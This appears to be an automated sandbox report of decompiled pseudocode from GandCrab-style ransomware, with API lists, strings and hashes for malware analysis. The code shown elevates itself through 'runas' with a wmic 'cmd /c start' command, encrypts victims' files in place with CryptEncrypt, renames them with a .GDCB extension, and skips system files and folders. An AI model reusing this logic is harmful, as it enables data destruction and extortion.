Opcode Fuzzy Hash: 48fe14e851f9cdb0a02b55434a4e35ce94c8d390de0bee5840af0d77f20b8882
Instruction Fuzzy Hash: DC4117B0148380DFE360DF119849B5BBEE2BB85B89F10491CE6985A291C7F6854CCFA7

Uniqueness

Uniqueness Score: -1.00%

Function 00A83BA0 Relevance: 77.1, APIs: 9, Strings: 35, Instructions: 109
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A83BA0(void* __ecx, void* __edx, void* __eflags) {
				char _v1020;
				short _v1028;
				char _v1532;
				short _v1540;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				intOrPtr _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1584;
				intOrPtr _v1588;
				intOrPtr _v1592;
				intOrPtr _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				intOrPtr _v1608;
				intOrPtr _v1612;
				intOrPtr _v1616;
				short _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				intOrPtr _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				intOrPtr _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				short _v1676;
				char _v1680;
				int _t54;
				struct HWND__* _t62;
				long _t66;
				void* _t76;
				void* _t78;
				void* _t80;

				_t78 = __ecx;
				_t54 = E00A83AE0(__edx);
				if(_t54 != 0) {
					_t54 = E00A83A60();
					if(_t54 == 0) {
						_v1676 = 0x770025;
						_v1672 = 0x6e0069;
						_v1668 = 0x690064;
						_v1664 = 0x250072;
						_v1660 = 0x73005c;
						_v1656 = 0x730079;
						_v1652 = 0x650074;
						_v1648 = 0x33006d;
						_v1644 = 0x5c0032;
						_v1640 = 0x620077;
						_v1636 = 0x6d0065;
						_v1632 = 0x77005c;
						_v1628 = 0x69006d;
						_v1624 = 0x63;
						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
						_v1620 = 0x720070;
						_v1616 = 0x63006f;
						_v1612 = 0x730065;
						_v1608 = 0x200073;
						_v1604 = 0x610063;
						_v1600 = 0x6c006c;
						_v1596 = 0x630020;
						_v1592 = 0x650072;
						_v1588 = 0x740061;
						_v1584 = 0x200065;
						_v1580 = 0x630022;
						_v1576 = 0x64006d;
						_v1572 = 0x2f0020;
						_v1568 = 0x200063;
						_v1564 = 0x740073;
						_v1560 = 0x720061;
						_v1556 = 0x200074;
						_v1552 = 0x730025;
						_v1548 = 0x22;
						wsprintfW( &_v1028,  &_v1620, _t78);
						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
						 *_t76 = 0x3c;
						 *(_t76 + 4) = 0x40;
						_t62 = GetForegroundWindow();
						_t80 = 0;
						 *(_t76 + 8) = _t62;
						_v1680 = 0x750072;
						_v1676 = 0x61006e;
						_v1672 = 0x73;
						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;
						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;
						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;
						 *(_t76 + 0x18) = 0;
						 *(_t76 + 0x1c) = 0;
						 *(_t76 + 0x20) = 0;
						while(1) {
							_t66 = ShellExecuteExW(_t76);
							if(_t66 != 0) {
								break;
							}
							_t80 = _t80 + 1;
							if(_t80 < 0x64) {
								continue;
							}
							_t54 = VirtualFree(_t76, _t66, 0x8000);
							goto L6;
						}
						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
						CloseHandle( *(_t76 + 0x38));
						ExitProcess(0);
					}
				}
				L6:
				return _t54;
			}

0x00a83baf
0x00a83bb1
0x00a83bb8
0x00a83bbe
0x00a83bc5
0x00a83bd7
0x00a83be4
0x00a83bed
0x00a83bf5
0x00a83bfd
0x00a83c05
0x00a83c0d
0x00a83c15
0x00a83c1d
0x00a83c25
0x00a83c2d
0x00a83c35
0x00a83c3d
0x00a83c45
0x00a83c4d
0x00a83c58
0x00a83c68
0x00a83c71
0x00a83c79
0x00a83c81
0x00a83c89
0x00a83c91
0x00a83c99
0x00a83ca1
0x00a83ca9
0x00a83cb4
0x00a83cbf
0x00a83cca
0x00a83cd5
0x00a83ce0
0x00a83ceb
0x00a83cf6
0x00a83d01
0x00a83d0c
0x00a83d17
0x00a83d31
0x00a83d33
0x00a83d39
0x00a83d40
0x00a83d4c
0x00a83d4e
0x00a83d55
0x00a83d5d
0x00a83d65
0x00a83d6d
0x00a83d77
0x00a83d81
0x00a83d84
0x00a83d8b
0x00a83d92
0x00a83da0
0x00a83da1
0x00a83da5
0x00000000
0x00000000
0x00a83da7
0x00a83dab
0x00000000
0x00000000
0x00a83db4
0x00000000
0x00a83db4
0x00a83dc6
0x00a83dcf
0x00a83dd7
0x00a83dd7
0x00a83bc5
0x00a83dba
0x00a83dc0

APIs

Part of subcall function 00A83AE0: _memset.LIBCMT ref: 00A83B32
Part of subcall function 00A83AE0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 00A83B56
Part of subcall function 00A83AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 00A83B5A
Part of subcall function 00A83AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 00A83B5E
Part of subcall function 00A83AE0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00A83B85

Part of subcall function 00A83A60: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A83A90

ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A83C4D
wsprintfW.USER32 ref: 00A83D17
VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 00A83D2B
GetForegroundWindow.USER32 ref: 00A83D40
ShellExecuteExW.SHELL32(00000000), ref: 00A83DA1
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00A83DB4
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A83DC6
CloseHandle.KERNEL32(?), ref: 00A83DCF
ExitProcess.KERNEL32 ref: 00A83DD7

Strings

e, xrefs: 00A83C2D
s, xrefs: 00A83D65
l, xrefs: 00A83C89
e, xrefs: 00A83CA9
\, xrefs: 00A83BFD
%, xrefs: 00A83D01
e, xrefs: 00A83C71
2, xrefs: 00A83C1D
a, xrefs: 00A83CA1
, xrefs: 00A83C91
s, xrefs: 00A83CE0
", xrefs: 00A83CB4
c, xrefs: 00A83C81
r, xrefs: 00A83D55
%, xrefs: 00A83BD7
i, xrefs: 00A83BE4
p, xrefs: 00A83C58
t, xrefs: 00A83CF6
", xrefs: 00A83D0C
r, xrefs: 00A83BF5
, xrefs: 00A83CCA
m, xrefs: 00A83CBF
s, xrefs: 00A83C79
y, xrefs: 00A83C05
w, xrefs: 00A83C25
o, xrefs: 00A83C68
d, xrefs: 00A83BED
t, xrefs: 00A83C0D
c, xrefs: 00A83CD5
c, xrefs: 00A83C45
a, xrefs: 00A83CEB
\, xrefs: 00A83C35
n, xrefs: 00A83D5D
m, xrefs: 00A83C15
r, xrefs: 00A83C99

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
API String ID: 561366689-3790645798
Opcode ID: 85099747eb97a1ffdb54e5ff3539023e4d940ed6042d4c535264a0f8100e9394
Instruction ID: 68a5fe6b75bc1f811bccfbbdece0979097412c03503ec64d507f379590a183f7
Opcode Fuzzy Hash: 85099747eb97a1ffdb54e5ff3539023e4d940ed6042d4c535264a0f8100e9394
Instruction Fuzzy Hash: 9D5136B0408341DFE720CF51D88CB9BBBF9BF84748F004A1DE6988A291D7B69558CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00A835E0 Relevance: 58.0, APIs: 29, Strings: 4, Instructions: 300
memoryfilestringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00A835E0(WCHAR* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				long _v12;
				long _v16;
				long _v20;
				long _v24;
				void* _v28;
				WCHAR* _v32;
				void* _v36;
				long _v40;
				void* _v44;
				void* _v48;
				WCHAR* _v52;
				void* _v56;
				void* _v60;
				signed int _v64;
				void _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				short _v80;
				long _v84;
				char _v88;
				char _v104;
				char _v108;
				char _v140;
				char _v388;
				void* _t92;
				void* _t93;
				void* _t95;
				void* _t100;
				void* _t106;
				long _t121;
				long _t122;
				long _t125;
				WCHAR* _t139;
				void* _t142;
				void* _t145;
				void* _t147;
				WCHAR* _t158;
				WCHAR* _t160;
				void* _t161;
				void* _t162;
				void _t164;
				long _t165;
				void* _t167;
				void* _t169;
				void* _t170;
				void* _t171;

				_t139 = __ecx;
				_t162 = __edx;
				_v52 = __ecx;
				SetFileAttributesW(_t139, GetFileAttributesW(__ecx) & 0xfffffffe);
				_v20 = 0;
				_v40 = 0;
				_t147 = _t162;
				E00A85EA0(_t147, 0, 0,  &_v20,  &_v40);
				_t158 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_v80 = 0x47002e;
				_v32 = _t158;
				_v76 = 0x430044;
				_v72 = 0x42;
				lstrcpyW(_t158, _t139);
				lstrcatW(_t158,  &_v80);
				asm("movdqa xmm0, [0xa90950]");
				asm("movdqu [ebp-0x88], xmm0");
				_push(_t147);
				asm("movdqa xmm0, [0xa90950]");
				asm("movdqu [ebp-0x78], xmm0");
				_v108 = 0;
				asm("movdqa xmm0, [0xa90950]");
				asm("movdqu [ebp-0x64], xmm0");
				E00A87DB0( &_v104, 0x10);
				E00A87DB0( &_v140, 0x20);
				_t92 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x88]");
				_t140 = _t92;
				asm("movdqu [ebx], xmm0");
				asm("movdqu xmm0, [ebp-0x78]");
				_v44 = _t92;
				asm("movdqu [ebx+0x10], xmm0");
				_t93 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x64]");
				_t159 = _t93;
				_v48 = _t93;
				asm("movdqu [edi], xmm0");
				_v88 = 0x20;
				_v84 = 0x10;
				_t95 = E00A86000(_v20, _v40, _t140,  &_v88, 0x800);
				_t169 = _t167 + 0x18;
				if(_t95 == 0) {
					L22:
					_t160 = _v32;
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x40], xmm0");
					_t164 = _v68;
					_v8 = _v64;
					L23:
					VirtualFree(_t160, 0, 0x8000);
					return _t164;
				}
				_t100 = E00A86000(_v20, _v40, _t159,  &_v84, 0x800);
				_t170 = _t169 + 0x14;
				if(_t100 != 0) {
					E00A87EE0( &_v140,  &_v388);
					_t171 = _t170 + 8;
					_t142 = CreateFileW(_v52, 0xc0000000, 1, 0, 3, 0x80, 0);
					_v36 = _t142;
					if(_t142 == 0xffffffff) {
						goto L22;
					}
					_t161 = VirtualAlloc(0, 8, 0x3000, 4);
					 *_t161 = 0;
					 *(_t161 + 4) = 0;
					_t106 = VirtualAlloc(0, 0x100001, 0x3000, 4);
					_t165 = 0;
					_v28 = _t106;
					_v24 = 0;
					while(ReadFile(_t142, _t106, 0x100000,  &_v12, 0) != 0) {
						_t121 = _v12;
						if(_t121 == 0) {
							break;
						}
						_t145 = 0;
						_v60 = 0;
						_t165 =  <  ? 1 : _t165;
						 *_t161 =  *_t161 + _t121;
						asm("adc [edi+0x4], ebx");
						_t122 = _v12;
						_v8 = _t122;
						if((_t122 & 0x0000000f) == 0) {
							L12:
							_v56 = VirtualAlloc(0, _t122, 0x3000, 4);
							E00A884E0(_t123, _v28, _v8);
							_t125 = _v12;
							_t171 = _t171 + 0xc;
							_v64 = _t125;
							if(VirtualAlloc(0, _t125, 0x3000, 4) != 0) {
								E00A83500(_v56, _v64,  &_v60,  &_v388,  &_v104, _t126);
								_t145 = _v60;
								_t171 = _t171 + 0x10;
							}
							VirtualFree(_v56, 0, 0x8000);
							SetFilePointer(_v36,  ~_v8, 0, 1);
							if(WriteFile(_v36, _t145, _v12,  &_v16, 0) == 0) {
								_t165 = 1;
								_v24 = 1;
							}
							VirtualFree(_t145, 0, 0x8000);
							_t142 = _v36;
							if(_t165 == 0) {
								_t106 = _v28;
								continue;
							} else {
								break;
							}
						}
						do {
							_t122 = _t122 + 1;
						} while ((_t122 & 0x0000000f) != 0);
						_v12 = _t122;
						goto L12;
					}
					VirtualFree(_v28, 0, 0x8000);
					if(_v24 == 0) {
						WriteFile(_t142, _v44, 0x100,  &_v16, 0);
						WriteFile(_t142, _v48, 0x100,  &_v16, 0);
						WriteFile(_t142, _t161, 0x10,  &_v16, 0);
					}
					CloseHandle(_t142);
					_t164 =  *_t161;
					_v8 =  *(_t161 + 4);
					VirtualFree(_t161, 0, 0x8000);
					VirtualFree(_v44, 0, 0x8000);
					VirtualFree(_v48, 0, 0x8000);
					_t160 = _v32;
					if(_v24 == 0) {
						MoveFileW(_v52, _t160);
					}
					goto L23;
				}
				GetLastError();
				goto L22;
			}

0x00a835eb
0x00a835ed
0x00a835f1
0x00a835ff
0x00a83608
0x00a83613
0x00a8361f
0x00a83621
0x00a8363c
0x00a8363e
0x00a83647
0x00a8364a
0x00a83651
0x00a83658
0x00a83663
0x00a83669
0x00a83676
0x00a8367e
0x00a8367f
0x00a8368a
0x00a8368f
0x00a83693
0x00a8369b
0x00a836a0
0x00a836b0
0x00a836c6
0x00a836c8
0x00a836d0
0x00a836de
0x00a836e4
0x00a836e9
0x00a836ec
0x00a836f1
0x00a836f3
0x00a836f8
0x00a83703
0x00a83706
0x00a8370a
0x00a83711
0x00a8371f
0x00a8372a
0x00a8372f
0x00a8397c
0x00a8397c
0x00a8397f
0x00a83982
0x00a8398a
0x00a8398d
0x00a83990
0x00a83998
0x00a839a5
0x00a839a5
0x00a83745
0x00a8374a
0x00a8374f
0x00a8376a
0x00a8376f
0x00a8378d
0x00a8378f
0x00a83795
0x00000000
0x00a83976
0x00a837aa
0x00a837b8
0x00a837be
0x00a837c5
0x00a837c7
0x00a837c9
0x00a837cc
0x00a837d4
0x00a837ef
0x00a837f4
0x00000000
0x00000000
0x00a837fa
0x00a83806
0x00a83809
0x00a8380c
0x00a8380e
0x00a83811
0x00a83814
0x00a83819
0x00a83828
0x00a8383b
0x00a83842
0x00a83847
0x00a8384a
0x00a8384d
0x00a83862
0x00a8387a
0x00a8387f
0x00a83882
0x00a83882
0x00a8388f
0x00a838a2
0x00a838bd
0x00a838bf
0x00a838c4
0x00a838c4
0x00a838cf
0x00a838d5
0x00a838da
0x00a837d1
0x00000000
0x00000000
0x00000000
0x00000000
0x00a838da
0x00a83820
0x00a83820
0x00a83821
0x00a83825
0x00000000
0x00a83825
0x00a838ea
0x00a838f4
0x00a8390b
0x00a8391c
0x00a83928
0x00a83928
0x00a8392b
0x00a83934
0x00a83944
0x00a83947
0x00a83953
0x00a8395f
0x00a83965
0x00a83968
0x00a8396e
0x00a8396e
0x00000000
0x00a83968
0x00a83751
0x00000000

APIs

GetFileAttributesW.KERNEL32(00000000,00000010,00000000,00000000), ref: 00A835F4
SetFileAttributesW.KERNEL32(00000000,00000000), ref: 00A835FF
VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040,00000000,00000000,00000000,?), ref: 00A8363A
lstrcpyW.KERNEL32 ref: 00A83658
lstrcatW.KERNEL32(00000000,0047002E), ref: 00A83663

Part of subcall function 00A87DB0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 00A87DD0
Part of subcall function 00A87DB0: VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 00A87DF8
Part of subcall function 00A87DB0: GetModuleHandleA.KERNEL32(?), ref: 00A87E4D
Part of subcall function 00A87DB0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00A87E5B
Part of subcall function 00A87DB0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00A87E6A
Part of subcall function 00A87DB0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00A87E8E
Part of subcall function 00A87DB0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A87E9C

Part of subcall function 00A87DB0: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00A8292B), ref: 00A87EB0
Part of subcall function 00A87DB0: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,00A8292B), ref: 00A87EBE

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 00A836C6
VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 00A836F1

Part of subcall function 00A86000: EnterCriticalSection.KERNEL32(00A92AE8,?,00A83724,00000000,00000000,00000000,?,00000800), ref: 00A8600B
Part of subcall function 00A86000: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,00A83724,00000000,00000000,00000000), ref: 00A8602E
Part of subcall function 00A86000: GetLastError.KERNEL32(?,00A83724,00000000,00000000,00000000), ref: 00A86038
Part of subcall function 00A86000: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,00A83724,00000000,00000000,00000000), ref: 00A86054

VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A83998

Part of subcall function 00A86000: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,00A83724,00000000,00000000), ref: 00A86089
Part of subcall function 00A86000: CryptGetKeyParam.ADVAPI32(00000000,00000008,00A83724,0000000A,00000000,?,00A83724,00000000), ref: 00A860AA
Part of subcall function 00A86000: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,00A83724,?,00A83724,00000000), ref: 00A860D2
Part of subcall function 00A86000: GetLastError.KERNEL32(?,00A83724,00000000), ref: 00A860DB
Part of subcall function 00A86000: CryptReleaseContext.ADVAPI32(00000000,00000000,?,00A83724,00000000,00000000), ref: 00A860F8
Part of subcall function 00A86000: LeaveCriticalSection.KERNEL32(00A92AE8,?,00A83724,00000000,00000000), ref: 00A86103

GetLastError.KERNEL32 ref: 00A83751
CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000), ref: 00A83787
VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000004), ref: 00A837A6
VirtualAlloc.KERNEL32(00000000,00100001,00003000,00000004), ref: 00A837C5
ReadFile.KERNEL32(00000000,00000000,00100000,?,00000000), ref: 00A837E1
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00A83832
_memmove.LIBCMT ref: 00A83842
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00A8385A
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A8388F

Strings

B, xrefs: 00A83651
., xrefs: 00A8363E
D, xrefs: 00A8364A
, xrefs: 00A8370A

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: Virtual$Crypt$Alloc$Context$FileFree$AcquireErrorLastRelease$AttributesCriticalSection$AddressCreateEncryptEnterHandleImportLeaveLibraryLoadModuleParamProcRead_memmovelstrcatlstrcpy
String ID: $.$B$D
API String ID: 837238375-1812608335
Opcode ID: 0d0efce677410bfd54303b87889b93ee190a9bfd29bb1954058a89551dc0334d
Instruction ID: ff174c6b1d168eaa04da8fb05eb3f1e33925dcc4e9e203bd9fa738256e064b2d
Opcode Fuzzy Hash: 0d0efce677410bfd54303b87889b93ee190a9bfd29bb1954058a89551dc0334d
Instruction Fuzzy Hash: 08B13C71E40309ABEB11DB94DC85FEEBBB8BF08B00F204115FA45BA1D1DBB55A45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A86240 Relevance: 31.6, APIs: 11, Strings: 10, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00A86240(WCHAR* __ecx) {
				int _t4;
				signed int _t5;
				signed int _t15;
				void* _t19;
				WCHAR* _t21;
				short* _t25;
				WCHAR* _t26;

				_t21 = __ecx;
				_t4 = lstrlenW(__ecx);
				_t5 = lstrlenW(_t21);
				_t1 = _t21 - 2; // -2
				_t25 = _t1 + _t5 * 2;
				_t19 = _t4 - 1;
				if(_t19 != 0) {
					do {
						_t25 = _t25 - 2;
						_t19 = _t19 - 1;
					} while ( *_t25 != 0x5c && _t19 != 0);
				}
				_t26 = _t25 + 2;
				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
						goto L5;
					} else {
						_t15 = lstrcmpiW(_t26, L"GDCB-DECRYPT.txt");
						asm("sbb eax, eax");
						return  ~_t15 + 1;
					}
				} else {
					L5:
					return 1;
				}
			}

0x00a86249
0x00a8624c
0x00a86251
0x00a86253
0x00a86256
0x00a86259
0x00a8625a
0x00a86260
0x00a86260
0x00a86263
0x00a86264
0x00a86260
0x00a86274
0x00a86281
0x00a86296
0x00000000
0x00a862e0
0x00a862e6
0x00a862eb
0x00a862f0
0x00a862f0
0x00a86285
0x00a86285
0x00a8628b
0x00a8628b

APIs

lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,00A86403), ref: 00A8624C
lstrlenW.KERNEL32(00000000), ref: 00A86251
lstrcmpiW.KERNEL32(-00000004,desktop.ini), ref: 00A8627D
lstrcmpiW.KERNEL32(-00000004,autorun.inf), ref: 00A86292
lstrcmpiW.KERNEL32(-00000004,ntuser.dat), ref: 00A8629E
lstrcmpiW.KERNEL32(-00000004,iconcache.db), ref: 00A862AA
lstrcmpiW.KERNEL32(-00000004,bootsect.bak), ref: 00A862B6
lstrcmpiW.KERNEL32(-00000004,boot.ini), ref: 00A862C2
lstrcmpiW.KERNEL32(-00000004,ntuser.dat.log), ref: 00A862CE
lstrcmpiW.KERNEL32(-00000004,thumbs.db), ref: 00A862DA
lstrcmpiW.KERNEL32(-00000004,GDCB-DECRYPT.txt), ref: 00A862E6

Strings

iconcache.db, xrefs: 00A862A4
boot.ini, xrefs: 00A862BC
GDCB-DECRYPT.txt, xrefs: 00A862E0
autorun.inf, xrefs: 00A8628C
ntuser.dat, xrefs: 00A86298
ntuser.dat.log, xrefs: 00A862C8
thumbs.db, xrefs: 00A862D4
desktop.ini, xrefs: 00A86277
iet, xrefs: 00A8626E
bootsect.bak, xrefs: 00A862B0

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: lstrcmpi$lstrlen
String ID: iet$GDCB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
API String ID: 203586893-3694586627
Opcode ID: 1f51fc8ba06ce697e2166760090cd69324b566e18aeab08b2ab585eda1ce4640
Instruction ID: 748dd1a0ce42dc038870b81aeb0f8eb7489bd32703f7b9fb4e81d49de03ab1e2
Opcode Fuzzy Hash: 1f51fc8ba06ce697e2166760090cd69324b566e18aeab08b2ab585eda1ce4640
Instruction Fuzzy Hash: 7B118E63F416263A6E6033B9AC05DEF12DCAD91BD03090765FA00F2084FB95DA238BB1

Uniqueness

Uniqueness Score: -1.00%

Function 00A86110 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 109
memoryCOMMON

Download Yara Rule

C-Code - Quality: 15%

			E00A86110(void* __ecx) {
				void* _t9;
				intOrPtr* _t20;
				void* _t42;
				void* _t45;

				_t42 = __ecx;
				_t45 = VirtualAlloc(0, 0x201, 0x3000, 0x40);
				if(E00A87BA0(_t42, L"\\ProgramData\\") != 0 || E00A87BA0(_t42, L"\\Program Files\\") != 0 || E00A87BA0(_t42, L"\\Tor Browser\\") != 0 || E00A87BA0(_t42, L"Ransomware") != 0 || E00A87BA0(_t42, L"\\All Users\\") != 0) {
					L15:
					VirtualFree(_t45, 0, 0x8000);
					return 0;
				} else {
					_t9 = E00A87BA0(_t42, L"\\Local Settings\\");
					if(_t9 != 0) {
						goto L15;
					} else {
						_t20 = __imp__SHGetSpecialFolderPathW;
						_push(_t9);
						_push(0x2a);
						_push(_t45);
						_push(_t9);
						if( *_t20() == 0 || E00A87BA0(_t42, _t45) == 0) {
							_push(0);
							_push(0x2b);
							_push(_t45);
							_push(0);
							if( *_t20() == 0 || E00A87BA0(_t42, _t45) == 0) {
								_push(0);
								_push(0x24);
								_push(_t45);
								_push(0);
								if( *_t20() == 0 || E00A87BA0(_t42, _t45) == 0) {
									_push(0);
									_push(0x1c);
									_push(_t45);
									_push(0);
									if( *_t20() == 0 || E00A87BA0(_t42, _t45) == 0) {
										VirtualFree(_t45, 0, 0x8000);
										return 1;
									} else {
										goto L15;
									}
								} else {
									goto L15;
								}
							} else {
								goto L15;
							}
						} else {
							goto L15;
						}
					}
				}
			}

0x00a86121
0x00a86130
0x00a86139
0x00a86228
0x00a86231
0x00a8623c
0x00a8618f
0x00a86196
0x00a8619d
0x00000000
0x00a861a3
0x00a861a3
0x00a861a9
0x00a861aa
0x00a861ac
0x00a861ad
0x00a861b2
0x00a861c1
0x00a861c3
0x00a861c5
0x00a861c6
0x00a861cc
0x00a861db
0x00a861dd
0x00a861df
0x00a861e0
0x00a861e6
0x00a861f5
0x00a861f7
0x00a861f9
0x00a861fa
0x00a86200
0x00a8621c
0x00a86227
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00a861b2
0x00a8619d

APIs

VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,00A86706,00000000,?,?), ref: 00A86123
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,00A86706,00000000,?,?), ref: 00A861AE
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,00A86706,00000000,?,?), ref: 00A861C8
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,00A86706,00000000,?,?), ref: 00A861E2
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,00A86706,00000000,?,?), ref: 00A861FC
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00A86706,00000000,?,?), ref: 00A8621C
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00A86706,00000000,?,?), ref: 00A86231

Strings

\Local Settings\, xrefs: 00A8618F
Ransomware, xrefs: 00A86167
\Tor Browser\, xrefs: 00A86153
\All Users\, xrefs: 00A8617B
\ProgramData\, xrefs: 00A86129
\Program Files\, xrefs: 00A8613F

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: FolderPathSpecial$Virtual$Free$Alloc
String ID: Ransomware$\All Users\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\
API String ID: 1363212851-106008693
Opcode ID: 32dcfbf585654d6e4030448062329cf6c673588d1b1bc6fd82f11e3cc728f5a5
